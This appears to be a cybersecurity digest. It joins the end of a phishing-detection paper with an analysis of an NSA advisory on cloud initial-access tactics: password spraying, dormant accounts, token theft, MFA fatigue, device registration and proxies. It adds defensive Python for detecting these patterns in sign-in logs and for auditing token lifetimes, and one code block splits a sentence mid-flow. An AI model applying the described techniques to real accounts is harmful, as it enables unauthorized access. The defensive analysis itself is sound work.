• Lastly, while the model is designed to operate without prior phishing-specific feature knowledge, this could also be a limitation. The model may struggle to accurately detect new or sophisticated phishing attempts that exploit features not considered in the model's training.

F. Implications for Future Research

• Model Generalization: The model's ability to operate without prior phishing-specific feature knowledge suggests that future research could explore the development of more generalized models that can adapt to various types of cyber threats without extensive retraining.

• Deep Learning Techniques: The success of the LSTM-based model indicates that deep learning techniques have significant potential in cybersecurity applications. Future research could further invest igate the integration of different neural network architectures and their effectiveness in threat detection.

• Feature Extraction: The use of character-level TF-IDF features and URL analysis in the model demonstrates the importance of feature extraction in phishing detection. Research could focus on identifying new features and methods of extraction to improve detection rates.

• Stack Generalization: The two-phase approach used in the model, which combines machine learning classifiers

and LSTM networks, showcases the benefits of stacked generalization. Future studies could explore other combinations of algorithms and models to enhance predictive performance.

• Benchmark Datasets: The use of benchmark datasets for model validation in this study underscores the need for comprehensive and up-to-date datasets in cybersecurity research. Future work could involve creating and maintaining datasets that reflect the latest threat landscapes.

G. Main Contribution to Cybersecurity

• Prior Feature Knowledge Independence: The model's ability to learn from URL strings as character sequences without the need for prior feature knowledge simplifies the detection process and makes it more adaptable to new and unknown phishing attacks.

• Strong Generalization Ability: The model's use of URL character-based features for robust generalization and check-side accuracy, combined with the integration of multi-level features in the neural network, contributes to its effectiveness in generalizing across different phishing threats.

• Independence from Cybersecurity Experts and Third-Party Services: By autonomously extracting necessary URL features, the model reduces reliance on cybersecurity experts and third-party services, making it a self-sufficient tool for phishing detection.

• Enhanced Detection Accuracy: The model's experimental validation on benchmark datasets demonstrated exceptional performance, with a notable accuracy of 96.04%, which is higher than that of existing studies.

• Contribution to Symmetry in Information Security: The research adds to the discourse on symmetry and asymmetry in information security by providing a model that can symmetrically learn and detect phishing URLs, thereby enhancing network security against evolving cyber threats.

H. Potential future research directions

• Improving Generalization Ability: The model has a strong generalization ability, utilizing URL character-based features for robust generalization and check-side accuracy. Future research could focus on further enhancing this ability, particularly in the context of evolving phishing tactics and techniques.

• Enhancing Independence from Cybersecurity Experts and Third-Party Services: The model autonomously extracts necessary URL features, eliminating reliance on cybersecurity experts and third-party services. Future research could explore ways to further improve this independence, potentially through the development of more sophisticated feature extraction techniques.

• Optimizing the Stacked Generalization Model: The model uses a two-phase stacked generalization model, with the first phase generating a mean prediction and the second phase utilizing a two-layered LSTM-based stack generalized model optimized for premier prediction in phishing site detection. Future research could focus on optimizing this model, perhaps through the use of different machine learning algorithms or techniques.

• Enhancing Accuracy: While the model has demonstrated high accuracy in detecting phishing sites, future research could focus on ways to further enhance this accuracy, particularly in the context of zero-day attacks and other advanced phishing techniques.

• Expanding the Model to Other Cybersecurity Applications: The model could potentially be adapted for other cybersecurity applications beyond phishing detection.

NSA’S PANIC. ADAPT TACTICS

Abstract – This document provides a comprehensive analysis of a publication which details the evolving tactics, techniques, and procedures (TTPs) employed by cyber actors to gain initial access to cloud-based systems. The analysis will cover various aspects including the identification and exploitation of vulnerabilities, different cloud exploitation techniques, and the deployment of custom malware.

The analysis provides a distilled exploration, highlighting the key points and actionable intelligence that can be leveraged by cybersecurity professionals, IT personnel, and specialists across various industries to enhance their defensive strategies against state-sponsored cyber threats. By understanding the actor's adapted tactics for initial cloud access, stakeholders can better anticipate and mitigate potential risks to their cloud-hosted infrastructure, thereby strengthening their overall security posture.

A. Introduction
The document titled "cyber actors adapt tactics for initial cloud access" released by the National Security Agency (NSA) warns that cyber actors have adapted their tactics to gain initial access to cloud services, as opposed to exploiting on-premise network vulnerabilities.

This shift is in response to organizations modernizing their systems and moving to cloud-based infrastructure. The high-profile cyber campaigns like the SolarWinds supply chain compromise are now expanding to sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations.

The stark reality is that to breach cloud-hosted networks, these actors need only to authenticate with the cloud provider, and if they succeed, the defenses are breached. The document highlights a particularly disconcerting aspect of cloud environments: the reduced network exposure compared to on-premises systems paradoxically makes initial access a more significant linchpin.

Over the past year, the TTPs observed have been alarmingly simple yet effective, with the cyber actors exploiting service and dormant accounts through brute force attacks. The document offers cold comfort: it implies a race against time for organizations to fortify their defenses against these TTPs and prevent initial access.

B. Key findings
• Adaptation to Cloud Services: Cyber actors have shifted their focus from exploiting on-premises network vulnerabilities to directly targeting cloud services. This change is a response to the modernization of systems and the migration of organizational infrastructure to the cloud.

• Authentication as a Key Step: To compromise cloud-hosted networks, cyber actors must first successfully authenticate with the cloud provider. Preventing this initial access is crucial to stop them from compromising the target.

• Expansion of Targeting: Cyber actors have broadened their targeting to include sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations. This expansion indicates a strategic diversification of targets for intelligence gathering.

• Use of Service and Dormant Accounts: The document highlights that cyber actors have been observed using brute force attacks to access service and dormant accounts over the last 12 months. This tactic allows them to gain initial access to cloud environments.

• Sophistication of cyber actors: The cyber actors can execute global supply chain compromises, such as the 2020 SolarWinds incident.

• Defense through Cybersecurity Fundamentals: The advisory emphasizes that a strong baseline of cybersecurity fundamentals can defend against cyber actors. For organizations that have transitioned to cloud infrastructure, protecting against TTPs for initial access is presented as a first line of defense.

C. Adaptation to Cloud Services
The adaptation of attacks to target cloud services marks a significant evolution in the landscape of cyber espionage and cyber warfare. This shift is not merely a change in target but represents a deeper strategic adaptation to the changing technological environment and the increasing reliance of governments and corporations on cloud infrastructure. The move towards cloud services by organizations is driven by the benefits of scalability, cost-efficiency, and the ability to rapidly deploy and update services. However, this transition also presents new vulnerabilities and challenges for cybersecurity.

1) Strategic Shift to Cloud
As organizations have modernized their systems and migrated to cloud-based infrastructure, actors have adapted their tactics, techniques, and procedures (TTPs) to this new environment. This adaptation is driven by the realization that cloud services, by centralizing vast amounts of data and

resources, present a lucrative target for espionage and intelligence gathering. The cloud's architecture, while offering numerous advantages to organizations, also necessitates a reevaluation of security strategies to address unique vulnerabilities.

2) Tactics, Techniques, and Procedures (TTPs)
The adaptation of actors to cloud services involves a range of sophisticated TTPs designed to exploit the specific characteristics of cloud environments. One of the primary methods of gaining initial access to cloud-hosted networks involves authenticating to the cloud provider. This can be achieved through various means, including brute forcing and password spraying to access service and dormant accounts. These accounts, often used to run and manage applications without direct human oversight, are particularly vulnerable as they may not be protected by multi-factor authentication (MFA) and may possess high levels of privilege.

Furthermore, actors have been observed using system-issued tokens for authentication, bypassing the need for passwords. They have also exploited the process of enrolling new devices to the cloud, bypassing MFA through techniques such as "MFA bombing" or "MFA fatigue." Additionally, the use of residential proxies to obscure their internet presence and make malicious activity harder to detect represents another layer of sophistication in their operations.

3) Implications and Mitigations
The adaptation of actors to target cloud services has significant implications for cybersecurity. It underscores the need for organizations to implement robust security measures tailored to the cloud environment. This includes enforcing strong password policies, implementing MFA, managing and monitoring service and dormant accounts, and configuring device enrollment policies to prevent unauthorized access. Additionally, adjusting the validity time of system-issued tokens and employing network-level defenses to detect and mitigate the use of residential proxies are critical steps in defending against these threats.

D. TTPs details:

• Credential Access / T1110 Brute Forcing: Actors utilize password spraying and brute forcing as initial infection vectors. This approach involves attempting multiple passwords against different accounts (password spraying) or numerous password attempts on a single account (brute forcing) to gain unauthorized access.

• Initial Access / T1078.004 Valid Accounts: Cloud Accounts: The actors gain access to cloud services by using compromised credentials. This includes targeting both system accounts (used for automated tasks and services) and dormant accounts (inactive accounts that still remain on the system).

• Credential Access / T1528 Steal Application Access Token: Actors exploit stolen access tokens to log into accounts without needing the passwords. Access tokens are digital keys that allow access to user accounts, and obtaining these can bypass traditional login mechanisms.

• Credential Access / T1621 Multi-Factor Authentication Request Generation: Known as 'MFA bombing' or 'MFA fatigue,' this technique involves actors repeatedly sending MFA requests to a victim's device. The goal is to overwhelm or fatigue the victim into accepting the request, thus granting the attacker access.

• Command and Control / T1090.002 Proxy: External Proxy: To maintain covert operations and blend in with normal traffic, actors use open proxies located in residential IP ranges. This makes malicious connections harder to distinguish from legitimate user activity in access logs.

• Persistence / T1098.005 Account Manipulation: Device Registration: After gaining access to accounts, actors attempt to register their own devices on the cloud tenant. Successful device registration can provide persistent access to the cloud environment.

1) Access via Service and Dormant Accounts
One of the key strategies employed by actors involves targeting service and dormant accounts within cloud environments. Service accounts are used to run and manage applications and services without direct human interaction. These accounts are particularly vulnerable because they often cannot be protected with multi-factor authentication (MFA) and may have highly privileged access depending on their role in managing applications and services. By gaining access to these accounts, threat actors can obtain privileged initial access to a network, which they can use as a launchpad for further operations.

The document also highlights that campaigns have targeted dormant accounts—accounts belonging to users who are no longer active within the victim organization but have not been removed from the system. These accounts can be exploited by attackers to regain access to a network, especially following incident response measures such as enforced password resets. Actors have been observed logging into these inactive accounts and following password reset instructions, allowing them to maintain access even after incident response teams have attempted to evict them.

2) Cloud-Based Token Authentication
Another TTP mentioned in the document is the use of cloud-based token authentication. Actors have been observed using system-issued access tokens to authenticate to victims' accounts without needing a password. This technique bypasses traditional credential-based authentication methods and can be particularly effective if the validity period of these tokens is long or if the tokens are not properly secured and managed.

3) Brute Forcing and Password Spraying
The document also describes the use of brute forcing (T1110) and password spraying by actors as initial infection vectors. These techniques involve attempting to access accounts by trying many passwords or using common passwords against many accounts, respectively. Such methods are often successful
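The T1110, T1621 and dormant-account TTPs listed above each leave a recognisable shape in identity-provider sign-in logs, independent of any known-bad indicator. The following is an added example, not part of the advisory or of this digest's analysis: a constructed log excerpt in an invented key=value layout and three detections over it, one for a source failing against many distinct accounts in a short window (spraying rather than brute force on one account), one for a successful sign-in to an account idle for months, marked separately when a password reset on that account precedes it, and one for a burst of MFA prompts to a single user. The thresholds (5 accounts in 10 minutes, 90 days of dormancy, 4 prompts in 5 minutes) and the account names are assumptions for the example and would be tuned per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed sign-in log excerpt (not from the advisory); the field layout is
# invented for this example, real identity providers use their own schemas.
SAMPLE_LOG = """\
2024-05-02T08:00:01Z event=login user=alice src=203.0.113.10 result=FAIL
2024-05-02T08:00:03Z event=login user=bob src=203.0.113.10 result=FAIL
2024-05-02T08:00:05Z event=login user=carol src=203.0.113.10 result=FAIL
2024-05-02T08:00:07Z event=login user=dave src=203.0.113.10 result=FAIL
2024-05-02T08:00:09Z event=login user=erin src=203.0.113.10 result=FAIL
2024-05-02T08:00:11Z event=login user=svc-backup src=203.0.113.10 result=SUCCESS
2024-05-02T08:30:00Z event=password_reset user=jsmith src=198.51.100.7 result=SUCCESS
2024-05-02T08:41:00Z event=login user=jsmith src=198.51.100.7 result=SUCCESS
2024-05-02T09:00:00Z event=mfa_push user=frank src=198.51.100.7 result=SENT
2024-05-02T09:00:20Z event=mfa_push user=frank src=198.51.100.7 result=SENT
2024-05-02T09:00:40Z event=mfa_push user=frank src=198.51.100.7 result=SENT
2024-05-02T09:01:00Z event=mfa_push user=frank src=198.51.100.7 result=APPROVED
2024-05-02T09:05:00Z event=login user=alice src=192.0.2.55 result=SUCCESS
"""
# Constructed directory snapshot: last successful sign-in per account.
LAST_SEEN = {"alice": "2024-05-01T17:00:00Z", "svc-backup": "2024-05-01T02:00:00Z",
             "frank": "2024-05-01T12:00:00Z",
             "jsmith": "2023-11-15T10:00:00Z"}  # jsmith left months ago, never removed
LINE_RE = re.compile(r"^(?P<ts>\S+) event=(?P<event>\S+) user=(?P<user>\S+) "
                     r"src=(?P<src>\S+) result=(?P<result>\S+)$")

def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)

def parse_log(text):
    """Parse matching lines into dicts (malformed lines are skipped), time-sorted."""
    events = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        rec = m.groupdict()
        rec["ts"] = parse_ts(rec["ts"])
        events.append(rec)
    return sorted(events, key=lambda e: e["ts"])

def _burst(evs, i, window):
    """Events from evs[i] onward that fall within `window` of evs[i]."""
    return [x for x in evs[i:] if x["ts"] - evs[i]["ts"] <= window]

def detect_password_spraying(events, window=timedelta(minutes=10), min_accounts=5):
    """One source failing against many distinct accounts inside one window:
    the spraying pattern, as opposed to many failures against one account."""
    fails = defaultdict(list)
    for e in events:
        if e["event"] == "login" and e["result"] == "FAIL":
            fails[e["src"]].append(e)
    alerts = []
    for src, evs in fails.items():
        for i in range(len(evs)):
            users = {x["user"] for x in _burst(evs, i, window)}
            if len(users) >= min_accounts:
                alerts.append({"src": src, "accounts": sorted(users)})
                break
    return alerts

def detect_dormant_logins(events, last_seen, dormant_after=timedelta(days=90)):
    """Successful sign-in to an account idle longer than dormant_after, noting
    whether a password reset on that account preceded it (the eviction-evasion
    pattern the advisory describes)."""
    resets = {}
    for e in events:
        if e["event"] == "password_reset":
            resets.setdefault(e["user"], e["ts"])
    alerts = []
    for e in events:
        if e["event"] == "login" and e["result"] == "SUCCESS" and e["user"] in last_seen:
            idle = e["ts"] - parse_ts(last_seen[e["user"]])
            if idle >= dormant_after:
                alerts.append({"user": e["user"], "idle_days": idle.days,
                               "after_reset": e["user"] in resets and resets[e["user"]] <= e["ts"]})
    return alerts

def detect_mfa_fatigue(events, window=timedelta(minutes=5), threshold=4):
    """A user receiving >= threshold MFA prompts in one window; a burst that
    ends in APPROVED is the case to page on."""
    pushes = defaultdict(list)
    for e in events:
        if e["event"] == "mfa_push":
            pushes[e["user"]].append(e)
    alerts = []
    for user, evs in pushes.items():
        for i in range(len(evs)):
            burst = _burst(evs, i, window)
            if len(burst) >= threshold:
                alerts.append({"user": user, "prompts": len(burst),
                               "approved": any(x["result"] == "APPROVED" for x in burst)})
                break
    return alerts

def run_detections(text=SAMPLE_LOG, last_seen=LAST_SEEN):
    events = parse_log(text)
    return {"password_spraying": detect_password_spraying(events),
            "dormant_logins": detect_dormant_logins(events, last_seen),
            "mfa_fatigue": detect_mfa_fatigue(events)}

if __name__ == "__main__":
    for name, hits in run_detections().items():
        print(name, hits)
```

On the sample, the spray from 203.0.113.10 is caught on the distinct-account count even though each account sees a single failure, which is exactly why per-account lockout counters miss it; the jsmith sign-in is reported as a dormant account reactivated after a reset, the case the advisory describes as surviving eviction; and frank's burst is reported with the APPROVED outcome, the one worth an immediate session revoke rather than a ticket.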

due to the use of weak or reused passwords across different accounts.

4) The Role of Access Tokens
Access tokens are an integral part of modern authentication systems, especially in cloud environments. They are designed to simplify the login process for users and provide a secure method of accessing resources without repeatedly entering credentials. Tokens are typically issued after a user logs in with a username and password, and they can be used for subsequent authentication requests.

5) Risks Associated with Token Authentication
While token-based authentication can offer convenience and security, it also introduces specific risks if not properly managed. If threat actors obtain these tokens, they can gain access to accounts without needing to know the passwords. This can be particularly problematic if the tokens have a long validity period or if they are not adequately secured.

6) Adjusting Token Validity
The document notes that the default validity time of system-issued tokens can vary depending on the system in use. However, it is crucial for cloud platforms to provide administrators with the ability to adjust the validity time of these tokens to suit their security needs. Shortening the validity period of tokens can reduce the window of opportunity for unauthorized access if tokens are compromised.

7) Bypassing Password Authentication and MFA
The document details how actors have successfully bypassed password authentication on personal accounts through techniques such as password spraying and credential reuse. Password spraying involves attempting to access a large number of accounts using commonly used passwords, while credential reuse exploits the tendency of users to recycle the same passwords across multiple accounts. These methods exploit weaknesses in password-based authentication systems to gain initial access to accounts.

Furthermore, actors have employed a technique known as 'MFA bombing' or 'MFA fatigue' (T1621) to bypass multi-factor authentication (MFA) systems. This technique involves repeatedly sending MFA requests to a victim's device until the victim, overwhelmed or frustrated by the constant notifications, accepts the request. This method effectively exploits human psychology and the inconvenience of repeated notifications to circumvent an otherwise robust security measure.

8) Enrolling New Devices to the Cloud
Once past these initial security barriers, the document reports that actors have been observed registering their own devices as new devices on the cloud tenant (T1098.005). This step is critical for maintaining access to the cloud environment and facilitating further malicious activities. The success of this tactic hinges on the absence of stringent device validation rules within the cloud tenant's security configuration. Without proper device validation measures, attackers can easily add unauthorized devices to the network, granting them access to sensitive data and systems.

9) Defense Against Unauthorized Device Enrollment
The document highlights the importance of configuring the network with robust device enrollment policies as a defense mechanism against such attacks. By implementing strict device validation rules and enrollment policies, organizations can significantly reduce the risk of unauthorized device registration. Instances where these measures have been effectively applied have successfully defended against actors, denying them access to the cloud tenant.

10) Residential Proxies and Their Use by Actors
Residential proxies are intermediary services that allow users to route their internet traffic through an IP address provided by an internet service provider (ISP) that is typically assigned to a residential address. This makes the traffic appear as if it is originating from a regular home user, which can be particularly useful for cyber actors looking to blend in with normal internet traffic and avoid raising red flags.

The use of residential proxies by actors serves to obfuscate their true location and the source of their malicious activities. By making their traffic appear to come from legitimate ISP ranges used by residential broadband customers, they can significantly reduce the likelihood of their connections being flagged as malicious. This tactic complicates the efforts of cybersecurity defenses that rely on IP address reputation or geolocation as indicators of compromise.

11) Challenges Posed by Residential Proxies
The effectiveness of residential proxies in hiding the origin of traffic presents a challenge for network defenses. Traditional security measures that track and block known malicious IP addresses may not be effective against attackers using residential proxies, as these IP addresses may not have a prior history of malicious activity and are indistinguishable from those of legitimate users.

E. Authentication as a Key Step
1) Authentication as a Key Step in Cloud Security
In the evolving landscape of cybersecurity, the adaptation of cyber actors to target cloud services underscores a pivotal shift in the tactics of cyber espionage. This transition from exploiting on-premises network vulnerabilities to directly targeting cloud-based infrastructures marks a significant evolution in cyber threats. At the heart of this shift is the critical role of authentication as a key step in securing cloud-hosted networks against sophisticated cyber actors.

2) The Importance of Authentication in Cloud Environments
Authentication serves as the gateway to cloud services, determining whether access should be granted to a user or system. In cloud environments, where resources and data are hosted off-premises and accessed over the internet, the importance of robust authentication mechanisms cannot be overstated. Unlike traditional on-premises setups, where physical security measures and internal network defenses can provide layers of security, cloud services are inherently more exposed to the internet. This exposure makes the initial step of authentication not just a security measure, but a critical defense mechanism against unauthorized access.

3) Challenges in Cloud Authentication
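Sections 5) and 6) above argue for shortening the validity time of system-issued tokens. An added example, not from the advisory, of auditing what has actually been issued: decode the payload of JWT-shaped tokens, compare exp minus iat against a policy maximum, and treat a token with no exp at all as a finding in its own right. The sample tokens, the svc-backup subject and the one-hour limit are constructed for the example; the payload is read without signature verification because this is a configuration audit of issued lifetimes, never an authentication check.

```python
import base64
import json
from datetime import datetime, timedelta, timezone

# Policy value assumed for this example: the longest token lifetime the
# organisation is willing to accept. The advisory gives no figure.
MAX_TOKEN_LIFETIME = timedelta(hours=1)

# Constructed issue time used to build the sample tokens below.
ISSUED_AT = datetime(2024, 5, 2, 8, 0, tzinfo=timezone.utc)


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop base64 padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def make_sample_token(lifetime=None, issued_at=ISSUED_AT) -> str:
    """Build an unsigned, JWT-shaped string purely as audit input for the
    example. It carries no signature and must never be accepted by a verifier."""
    claims = {"sub": "svc-backup", "iat": int(issued_at.timestamp())}
    if lifetime is not None:
        claims["exp"] = int((issued_at + lifetime).timestamp())
    header = _b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{_b64url_encode(json.dumps(claims).encode())}."


def audit_token_lifetime(token: str, max_lifetime=MAX_TOKEN_LIFETIME) -> dict:
    """Report the lifetime a token was issued with and whether it exceeds
    policy. The payload is decoded without signature verification because
    this is a configuration audit, not an authentication decision."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT-shaped token")
    claims = json.loads(_b64url_decode(parts[1]))
    if "exp" not in claims:
        # No expiry means the token is valid until revoked: always a finding.
        return {"subject": claims.get("sub"), "lifetime_seconds": None,
                "missing_exp": True, "exceeds_policy": True}
    issued = claims.get("iat", claims.get("nbf"))
    if issued is None:
        raise ValueError("token has exp but no iat/nbf to measure from")
    lifetime = claims["exp"] - issued
    return {"subject": claims.get("sub"), "lifetime_seconds": lifetime,
            "missing_exp": False,
            "exceeds_policy": lifetime > max_lifetime.total_seconds()}


def audit_all(tokens, max_lifetime=MAX_TOKEN_LIFETIME):
    """Return only the tokens that violate the lifetime policy."""
    return [r for r in (audit_token_lifetime(t, max_lifetime) for t in tokens)
            if r["exceeds_policy"]]


if __name__ == "__main__":
    samples = [
        make_sample_token(timedelta(minutes=15)),  # within policy
        make_sample_token(timedelta(days=30)),     # far too long
        make_sample_token(None),                   # never expires
    ]
    for finding in audit_all(samples):
        print(finding)
```

Run against tokens pulled from an identity provider's issuance log, the two findings this produces are the ones the advisory's mitigation targets: a lifetime that leaves a stolen token usable for weeks, and a token with no expiry that stays usable until someone notices and revokes it.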

The shift towards cloud services brings with it unique challenges in implementing effective authentication strategies. One of the primary challenges is the diverse and dynamic nature of cloud environments. Users access cloud services from various locations, devices, and networks, necessitating flexible yet secure authentication mechanisms that can adapt to different contexts without compromising security.

Moreover, the scalability of cloud services means that authentication mechanisms must be able to handle a large number of access requests without introducing significant latency or degrading the user experience. This requirement for scalability and user-friendliness often conflicts with the need for stringent security measures, creating a delicate balance that organizations must navigate.

4) Strategies for Strengthening Cloud Authentication
To address the challenges of cloud authentication and protect against sophisticated cyber actors, organizations can adopt several strategies:
• Multi-Factor Authentication (MFA): MFA adds an extra layer of security by requiring users to provide two or more verification factors to gain access. This significantly reduces the risk of unauthorized access, as obtaining multiple authentication factors is considerably more difficult for attackers. Factors differ in strength, however: SMS codes and push approvals can be phished or worn down by prompt fatigue, whereas phishing-resistant methods such as FIDO2/WebAuthn or certificate-based authentication bind the factor to the legitimate origin.
• Adaptive Authentication: Adaptive authentication mechanisms adjust the authentication requirements based on the context of the access request. Factors such as the user's location, device, and behavior can influence the authentication process, allowing for stricter controls in higher-risk scenarios.
• Zero Trust Architecture: Adopting a zero-trust approach to cloud security, where no user or system is trusted by default, can enhance the effectiveness of authentication. This model requires strict identity verification for every user and device trying to access resources, regardless of their location or network.
• Use of Biometrics: Biometric authentication methods, such as fingerprint scans or facial recognition, leverage unique physical characteristics of users. In practice they are best used to unlock a device-bound credential locally (as in FIDO2 passkeys) rather than being transmitted to the cloud service, because a biometric template, unlike a password, cannot be rotated if it leaks.
• Protection of Authentication Data: Ensuring that all authentication data is protected both in transit and at rest guards against interception and misuse by attackers. This includes passwords (stored only as salted, slow hashes, never reversibly encrypted), authentication tokens, and other sensitive material used in the authentication process.

F. Increased Importance of Initial Access
1) The Increased Importance of Initial Access in Cloud Security
The shift in focus by cyber actors to cloud services has brought the importance of securing initial access to the forefront of cybersecurity efforts. In cloud environments, initial access represents the critical juncture at which the security of the entire system is most vulnerable. Unlike traditional on-premises networks, where multiple layers of security can be deployed, cloud services are accessed over the internet, making the initial point of entry a prime target for attackers.

2) Initial Access as a Foothold for Attackers
Gaining initial access to cloud services allows attackers to establish a foothold within the target environment. From this position, they can potentially escalate privileges, move laterally across the network, and access sensitive data. The distributed nature of cloud services also means that compromising a single account can have far-reaching consequences, potentially giving attackers access to a wide array of resources and data.

3) Challenges in Securing Initial Access
• Remote Access: Cloud services are designed to be accessed remotely, which inherently increases the attack surface. Remote access points must be secured against unauthorized entry while still providing legitimate users with the necessary access.
• Identity and Access Management (IAM): In cloud environments, IAM becomes a critical component of security. Organizations must ensure that IAM policies are robust and that permissions are granted based on the principle of least privilege to minimize the risk of initial access by unauthorized entities.
• Phishing and Social Engineering: Attackers often use phishing and social engineering tactics to gain initial access. These methods exploit human factors rather than technical vulnerabilities, making them difficult to defend against with traditional security measures.

4) Examples of Initial Access Techniques
• Credential Stuffing: This technique involves using previously breached username and password pairs to gain unauthorized access to accounts, banking on the likelihood that individuals reuse credentials across multiple services.
• Exploiting Misconfigurations: Cloud services can be complex to configure correctly, and attackers often exploit misconfigurations, such as open storage buckets or improperly set access controls, to gain initial access.
• Compromising Third-Party Services: Attackers may target third-party services that integrate with cloud environments, such as SaaS applications, to gain initial access to the cloud infrastructure.

5) Mitigating the Risks of Initial Access
• Comprehensive Access Policies: Establishing and enforcing comprehensive access policies can help control who has access to cloud resources and under what conditions.
• Regular Audits and Reviews: Conducting regular audits and reviews of access logs and permissions can help identify and rectify potential vulnerabilities before they are exploited.

• Security Awareness Training: Educating employees about the risks of phishing and social engineering can reduce the likelihood of credentials being compromised.
• Endpoint Security: Ensuring that all devices used to access cloud services are secure and up to date can prevent attackers from exploiting endpoint vulnerabilities to gain initial access.
• Anomaly Detection: Implementing anomaly detection systems can help identify unusual access patterns or login attempts that may indicate an attempted breach.

G. Expansion of Targeting
1) The Expansion of Targeting
The strategic expansion of targeting by cyber actors to a broader range of sectors is a concerning development in the realm of global cybersecurity. This diversification of targets reflects a calculated approach by these actors to exploit the interconnected nature of modern industries and the increasing reliance on cloud services across various sectors.

2) Broadening the Scope of Espionage
The expansion into sectors such as aviation, education, law enforcement, local and state councils, government financial departments, and military organizations demonstrates their intent to gather intelligence from a wide spectrum of sources. This broad targeting strategy suggests that the actors are not only interested in traditional national security-related information but also in acquiring a diverse set of data that could provide economic, political, or technological advantages.

3) Implications for Different Sectors
• Aviation: The aviation industry involves a complex ecosystem of airlines, airports, manufacturers, and support services, all of which handle sensitive data related to national security, safety, and proprietary technology.
• Education: Universities and research institutions are rich sources of cutting-edge research and intellectual property. They are often targeted for their groundbreaking work in science, technology, and defense-related areas.
• Law Enforcement: Law enforcement agencies hold sensitive data on criminal investigations, national security matters, and personal information of citizens, making them a high-value target for espionage.
• Local and State Councils: Local and state government entities manage critical infrastructure and citizen services and have access to vast amounts of personal data, which can be exploited for various malicious purposes.
• Government Financial Departments: These departments handle sensitive economic data and have insight into national financial strategies and policies, which can be valuable for foreign intelligence services.
• Military Organizations: Military targets are of high interest due to their strategic importance and access to classified information on defense capabilities, operations, and technologies.

4) Challenges in Defending a Wide Range of Targets
• Diverse Security Postures: Different sectors have varying levels of cybersecurity maturity and resources, making some more vulnerable to sophisticated cyber threats.
• Interconnectedness: The interconnected nature of these sectors means that a breach in one area can have cascading effects on others, as seen in supply chain attacks.

5) Strategies for Mitigating Expanded Targeting Risks
• Sector-Specific Cybersecurity Frameworks: Developing and implementing cybersecurity frameworks tailored to the unique needs and risks of each sector can enhance overall security.
• Information Sharing: Sharing threat intelligence and best practices within and between sectors can help organizations stay ahead of emerging threats and coordinate responses to incidents.
• Regular Security Assessments: Conducting regular security assessments and penetration testing can help organizations identify and address vulnerabilities before they are exploited.
• Supply Chain Security: Strengthening the security of the supply chain is critical, as attackers often target less secure elements within the supply chain to gain access to larger organizations.
• Incident Response Planning: Having a well-defined incident response plan ensures that organizations are prepared to respond quickly and effectively to a breach.

H. Use of Service and Dormant Accounts
1) The Use of Service and Dormant Accounts in Attacks
The exploitation of service and dormant accounts by cyber actors represents a sophisticated and often overlooked vector of cyber-attacks. These accounts, which are created for various operational purposes within an organization's cloud and on-premises environments, can provide attackers with the access they need to carry out their objectives if not properly managed and secured.

2) Understanding Service and Dormant Accounts
Service accounts are specialized accounts used by applications or services to interact with the operating system or other services. They often have elevated privileges to perform specific tasks and may not be tied to an individual user's identity. Dormant accounts, on the other hand, are user accounts that are no longer actively used, either because the user has left the organization or because the account's purpose has been fulfilled. These accounts are particularly risky because they are frequently forgotten, left with more privileges than necessary, and not monitored as closely as active user accounts.

3) Why Service and Dormant Accounts Are Targeted
• Elevated Privileges: Service accounts often have the elevated privileges necessary for system tasks, which can be exploited to gain wide access to an organization's network.

• Lack of Monitoring: Dormant accounts are not regularly used, making them less likely to be monitored for suspicious activity, and thus an attractive target for attackers.
• Weak or Default Credentials: Service accounts may be configured with weak or default credentials that are easier for attackers to guess or to recover through brute-force attacks.
• Bypassing User Behavior Analytics: Since service accounts perform automated tasks, their behavior patterns are predictable, allowing malicious activity to blend in with normal operations and evade detection.

4) The Threat Posed by Compromised Accounts
With control of such an account, an attacker can:
• Move Laterally: Use the account's privileges to move laterally within the network, accessing other systems and data.
• Escalate Privileges: Leverage the account to escalate privileges and gain administrative access to critical systems.
• Maintain Persistence: Establish a persistent presence within the network, making it more difficult to detect and remove the attacker.
• Exfiltrate Data: Access and exfiltrate sensitive data, leading to data breaches and intellectual property theft.

5) Mitigating the Risks Associated with Service and Dormant Accounts
• Regular Audits: Conduct regular audits of all accounts to identify and deactivate dormant accounts and to ensure that service accounts have the minimum necessary privileges.
• Strong Authentication Controls: Enforce strong password policies and use multi-factor authentication (MFA) for service accounts where possible. Most service accounts cannot complete an interactive MFA prompt, so the practical equivalents are workload identities or short-lived certificate credentials, blocked interactive sign-in, and an alert on any interactive use.
• Monitoring and Alerting: Implement monitoring and alerting mechanisms to detect unusual activity associated with service and dormant accounts.
• Segregation of Duties: Apply the principle of segregation of duties to service accounts to limit the scope of access and reduce the risk of misuse.
• Automated Management Tools: Use automated account management tools to track account usage and lifecycle, ensuring that accounts are deactivated when no longer needed.

I. Sophistication of cyber actors
1) The Sophistication of Cyber Operations
The actors have demonstrated a high level of sophistication in their cyber operations, reflecting a deep understanding of the global cyber landscape and an ability to adapt and innovate in the face of evolving security measures. This sophistication is evident not only in their technical capabilities but also in their strategic approach to cyber espionage, which involves careful target selection, meticulous planning, and the use of advanced tactics, techniques, and procedures (TTPs).

2) Technical Prowess and Innovation
Their cyber operations are characterized by the use of custom malware and zero-day vulnerabilities, that is, software vulnerabilities not yet disclosed to the software maker or the public. Exploiting such vulnerabilities allows them to infiltrate target networks undetected. An example of this is the SolarWinds supply chain attack, in which the actors are believed to have compromised the software development process to insert malicious code into a software update, affecting thousands of SolarWinds' clients, including government agencies and Fortune 500 companies.

3) Operational Security and Stealth
Operational security (OpSec) is a hallmark of their operations, with the agency going to great lengths to cover its tracks and maintain stealth within compromised networks. This includes the use of encrypted channels for exfiltrating data, the careful management of command-and-control servers to avoid detection, and the use of legitimate tools and services (a technique known as "living off the land") to blend in with normal network activity. The ability to maintain a low profile within target networks often allows them to conduct long-term espionage operations without detection.

4) Psychological and Social Engineering Tactics
